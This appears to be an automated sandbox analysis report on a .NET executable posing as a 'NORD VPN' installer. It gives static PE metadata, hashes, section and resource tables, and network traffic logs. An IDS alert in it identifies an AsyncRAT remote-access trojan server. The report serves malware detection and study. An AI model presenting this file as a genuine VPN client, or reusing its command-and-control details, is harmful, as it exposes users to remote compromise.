                                                                                                                                                                                                                  SSDEEP:192:9DPhbcIbsHy0369P99j999M99Du999W999969999939999p99999799999A9999L:9DZcIISYI3G
                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......>......".... ...@....@.. ....................................@................................

                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                  Icon Hash:f0ce284e86879ccd

                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Entrypoint:0x402e22
                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                  Time Stamp:0xDE169215 [Tue Jan 27 05:52:21 2088 UTC]
                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2dcf0x4f.text
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x3b24.rsrc
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x2d300x38.text
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                  .text0x20000xe280x1000False0.490234375data4.92008205051IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .rsrc0x40000x3b240x3c00False0.155859375data2.95852725153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .reloc0x80000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                  RT_ICON0x41000x34b4data
                                                                                                                                                                                                                  RT_GROUP_ICON0x75c40x14data
                                                                                                                                                                                                                  RT_VERSION0x75e80x33cdata
                                                                                                                                                                                                                  RT_MANIFEST0x79340x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                                                                                                                  Version Infos

                                                                                                                                                                                                                  DescriptionData
                                                                                                                                                                                                                  Translation0x0000 0x04b0
                                                                                                                                                                                                                  LegalCopyrightCopyright 2021
                                                                                                                                                                                                                  Assembly Version1.0.0.0
                                                                                                                                                                                                                  InternalNameNORD VPN.exe
                                                                                                                                                                                                                  FileVersion1.0.0.0
                                                                                                                                                                                                                  CompanyNameNORD VPN
                                                                                                                                                                                                                  LegalTrademarks
                                                                                                                                                                                                                  CommentsNORD VPN
                                                                                                                                                                                                                  ProductNameNORD VPN
                                                                                                                                                                                                                  ProductVersion1.0.0.0
                                                                                                                                                                                                                  FileDescriptionNORD VPN
                                                                                                                                                                                                                  OriginalFilenameNORD VPN.exe

                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  06/11/21-06:34:57.477264TCP2030673ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)110749747216.230.75.62192.168.2.3

                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.386857033 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.592504978 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.593013048 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.611608028 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.816865921 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.816925049 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.816960096 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.817001104 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.817030907 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.817200899 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.820400953 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.820432901 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.820518017 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.820571899 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.886559963 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:01.092087984 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:01.092324018 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:01.092437029 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:01.159507036 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:01.367537975 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:01.367827892 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:01.367949963 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:04.742163897 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:04.742221117 CEST44349715207.241.227.112192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:04.742320061 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:04.742366076 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.144542933 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.349219084 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.349448919 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.377583027 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.581588030 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583529949 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583573103 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583611012 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583637953 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583709002 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.583765030 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.587261915 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.587302923 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.587429047 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.588885069 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.793080091 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.793298960 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.821546078 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.026498079 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.026823044 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.026899099 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.026947021 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.027025938 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.068955898 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:07.025002003 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:07.025049925 CEST44349719207.241.227.119192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:07.025233030 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:09.588546991 CEST49715443192.168.2.3207.241.227.112
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.806397915 CEST49719443192.168.2.3207.241.227.119
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.881453991 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.086833000 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.087049007 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.087373972 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.293823957 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.293888092 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.293930054 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.293967009 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.293993950 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.294092894 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.294146061 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.297117949 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.297152996 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.297298908 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.298930883 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.505347967 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.505788088 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.506927013 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.714204073 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.716938972 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.773483038 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.795209885 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.000025034 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.001348019 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.001825094 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206243992 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206476927 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206526041 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206563950 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206592083 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206643105 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.206732988 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.208666086 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.208700895 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.208810091 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.213979959 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.419667006 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.424873114 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.655775070 CEST44349728207.241.224.2192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.695528030 CEST49728443192.168.2.3207.241.224.2
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.716933012 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.716984987 CEST44349727207.241.227.126192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.717125893 CEST49727443192.168.2.3207.241.227.126
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.723805904 CEST49729443192.168.2.3207.241.232.198
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.929640055 CEST44349729207.241.232.198192.168.2.3

                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Jun 11, 2021 06:33:52.886456013 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:52.936815023 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:33:54.005274057 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:54.060467958 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:33:55.149044991 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:55.199678898 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:33:56.195935965 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:56.249830961 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:33:57.607207060 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:57.661653996 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:33:58.875688076 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:33:58.929194927 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.052814960 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.113637924 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.302654982 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.373203039 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:00.970441103 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:01.023638010 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:02.960165977 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:03.011132002 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:03.998213053 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:04.048971891 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.073461056 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.133929014 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.136739016 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:05.184410095 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.223067999 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:06.284346104 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:07.419682026 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:07.482762098 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:08.592658997 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:08.646105051 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:09.713396072 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:09.764461994 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:10.635119915 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:10.689925909 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:11.569936991 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:11.621920109 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.809737921 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:21.880702019 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.730957031 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:22.794511080 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.659003973 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:23.723062992 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:26.094538927 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:26.171586037 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:29.830260038 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:29.891926050 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:48.423593044 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:48.484875917 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:51.268249989 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:51.420285940 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.042872906 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.188497066 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.801496983 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.817574024 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.863476992 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:52.893306017 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:53.325093031 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:53.388535023 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:53.975155115 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:54.036981106 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.138559103 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.197886944 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.725730896 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:55.786588907 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:56.619487047 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:56.679840088 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:57.957540989 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:58.016989946 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:34:59.056586981 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                                                                  Jun 11, 2021 06:34:59.117165089 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                                                                  Jun 11, 2021 06:35:07.309668064 CEST6293853192.168.2.38.8.8.8
